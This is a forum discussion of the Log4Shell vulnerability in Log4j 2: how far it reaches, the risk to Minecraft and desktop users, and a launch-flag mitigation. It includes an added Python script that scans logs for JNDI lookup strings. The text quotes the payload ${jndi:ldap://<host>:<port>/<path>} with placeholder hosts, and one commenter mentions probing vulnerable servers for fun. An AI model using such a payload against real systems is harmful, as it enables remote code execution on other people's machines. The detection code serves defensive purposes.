Log4Shell may, with no exaggeration, be the worst IT security problem of our generation. Here's what it is and what you can do about it.
may be the worst IT security problem of our generation so far.
I have trouble believing that because it seems so easy to fix and only affects Java. Care to say why you think it will be the worst?
The ubiquity of Java in the corporate sector and how trivially easy it is to exploit.
Large companies are also not known for being on top of updating software. Java also has plenty of embedded use cases that can't be updated. "3 Billion Devices Run Java", after all...
Trivially easy to exploit means really trivially easy to exploit. I had some fun when this first went public and was able to find loads of vulnerable servers. Most of them have been updated by now, but it's not just front-facing web interfaces that are vulnerable - there are so many ways to get a string to be logged.
Other languages which run on the JVM also make use of Java libraries either through direct interoperability or via wrappers. The access to these huge libraries is often a big selling point for these languages.
Scala, Kotlin, Groovy (especially due to its use in Jenkins CI products), and Clojure come to mind immediately as some of the more popular ones.
I probably got a skewed idea of where things stand from working at Google, and because I stopped working with Java before log4j 2 even came out.
Because it's hidden away in more programs than I can count. See:
https://github.com/NCSC-NL/log4shell/tree/main/software
for the best list to date.
But, that's only the public programs. We know log4j is hidden away in Java JAR files in hundreds of thousands of other programs.
Yeah, my IT department has been shitting themselves all week over this. Lots of reaching out to vendors to ask if they are vulnerable to this exploit.
I’ve never been so happy that all my services are sandboxed.
I note that it mentions the Minecraft launcher and the fact that obviously lots of programs use Java and potentially this library. But most of this article seems focused on IT - are there things a regular PC user should do, or is it more of a server issue...?
Likely not. Java has not been particularly popular as a platform for desktop applications for a while - and Android, for which everything is in Java, has its own standard logging framework. In addition, if said application isn't directly connected to the internet - it doesn't mean it isn't vulnerable, but with all the juicy servers available it's fairly unlikely someone is going to try and exploit your ebook managers by having you download and open ${jndi:ldap://<host>:<port>/<path>}.epub. Just be ready to reset passwords.
It might be possible for a Minecraft server to RCE the Minecraft client. So if you use Java programs to connect to untrusted servers you need to make sure those programs don't use a vulnerable version of Log4J2.
The PS5 version of Minecraft isn't written in Java, so you're probably fine. It's the Java version of Minecraft on PC that is in danger.
It is likely that somewhere on the PS5 there was an old copy of Log4J2. But I would assume it's patched by now. The main issue with PC Minecraft is players often run very old versions of the game that will go unpatched, perhaps forever.
That's unlikely. The console versions of Minecraft are running the C++ rewrite of the game. The java version was never shipped to consoles.
I just mean it's got a whole OS in there... gotta have some Java on the computer.
I am somewhat doubtful of that as well. Presumably the PS5's OS descends from Sony's prior OSes, which would be even more unlikely to have any Java on it since memory was a premium until at least the PS4's generation. Almost all of it is probably C/C++ - and probably C++ with either std excluded or a custom variant of std without the custom allocators.
Even if it did have Java, like Android, it would almost certainly use an in-house logging framework design to work with their devkits.
It is possible that other games run Java, though, in particular indies since LibGDX is fairly popular - although if it's not a multiplayer game I wouldn't worry much about the attack vectors and I'd also be somewhat doubtful that they'd use log4j.
Blu-ray Discs use Java for special features.
https://en.wikipedia.org/wiki/BD-J
Even the PS3 had Java. (Though probably no log4j 2.x)
Supposedly adding a -Dlog4j2.formatMsgNoLookups=true to the launch options mitigates this in old versions.
That works in 1.17.x and 1.18.0. For earlier versions, Mojang posted some mitigation steps on their blog.
https://www.minecraft.net/en-us/article/important-message--security-vulnerability-java-edition
Hopefully Mojang adds that as a default launch option.
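Added example, not from this thread, the linked article, Mojang or the Log4j project: a small Python script covering the two defensive checks the comments above touch on. It scans log lines for the plain ${jndi:<scheme>:...} lookup string (the form quoted in the ebook comment), so a defender can see whether someone tried to get such a string logged, and it checks a JVM launch-option list for the -Dlog4j2.formatMsgNoLookups=true flag from the Minecraft comment. The log lines and argument lists are constructed samples; the regex, dataclass and function names are mine.

```python
import re
from dataclasses import dataclass

# Matches a Log4j 2 JNDI lookup such as ${jndi:ldap://<host>:<port>/<path>}
# and captures the scheme so the finding can be reported. Only the plain
# form is recognised; a clean result means "nothing obvious", not "safe".
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:", re.IGNORECASE)

# The launch flag discussed in the thread. Its presence only says the
# mitigation was requested, not that the bundled library is patched.
NO_LOOKUPS_FLAG = "-Dlog4j2.formatMsgNoLookups=true"

# Constructed sample log lines (assumption: an access log plus an app log).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    'INFO  [main] Initializing JNDI context for datasource jdbc/app',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://<host>:<port>/<path>}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /login HTTP/1.1" 200 128 "-" "${JNDI:LDAP://<host>:<port>/<path>}"',
    'INFO  [reader] Opened book "${jndi:ldap://<host>:<port>/<path>}.epub"',
]


@dataclass
class Finding:
    line_no: int   # 1-based line number in the scanned input
    scheme: str    # JNDI scheme named in the lookup, lower-cased
    text: str      # the offending line, stripped


def find_jndi_lookups(log_lines):
    """Return one Finding per log line that carries a JNDI lookup string."""
    findings = []
    for n, line in enumerate(log_lines, start=1):
        m = JNDI_LOOKUP.search(line)
        if m:
            findings.append(Finding(n, m.group(1).lower(), line.strip()))
    return findings


def has_no_lookups_flag(jvm_args):
    """True if the launch options contain exactly -Dlog4j2.formatMsgNoLookups=true."""
    return any(arg.strip() == NO_LOOKUPS_FLAG for arg in jvm_args)


def triage(log_lines, jvm_args):
    """Summarise both checks in one dict for a quick report."""
    findings = find_jndi_lookups(log_lines)
    return {
        "lookup_attempts": len(findings),
        "schemes_seen": sorted({f.scheme for f in findings}),
        "no_lookups_flag_present": has_no_lookups_flag(jvm_args),
    }


if __name__ == "__main__":
    # Constructed launch options, as they might appear in a launcher profile.
    launch_args = ["-Xmx2G", "-Dlog4j2.formatMsgNoLookups=true"]
    for f in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {f.line_no}: jndi lookup via {f.scheme}: {f.text}")
    print(triage(SAMPLE_LOG, launch_args))
```

The benign line mentioning a JNDI context is not reported, because the pattern needs the ${jndi: lookup syntax, not the word. The flag check is deliberately exact: a value of false, or a misspelt property, should not count as mitigated. As the thread notes, the flag only helps the versions it applies to; updating the library itself is still the fix.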
This is much more of a server issue, but it will still hit PC users if they use corrupted services, which have been cracked by Log4Shell attacks. Think of it as a skeleton key to servers, once unlocked the potential is there for all kinds of attacks.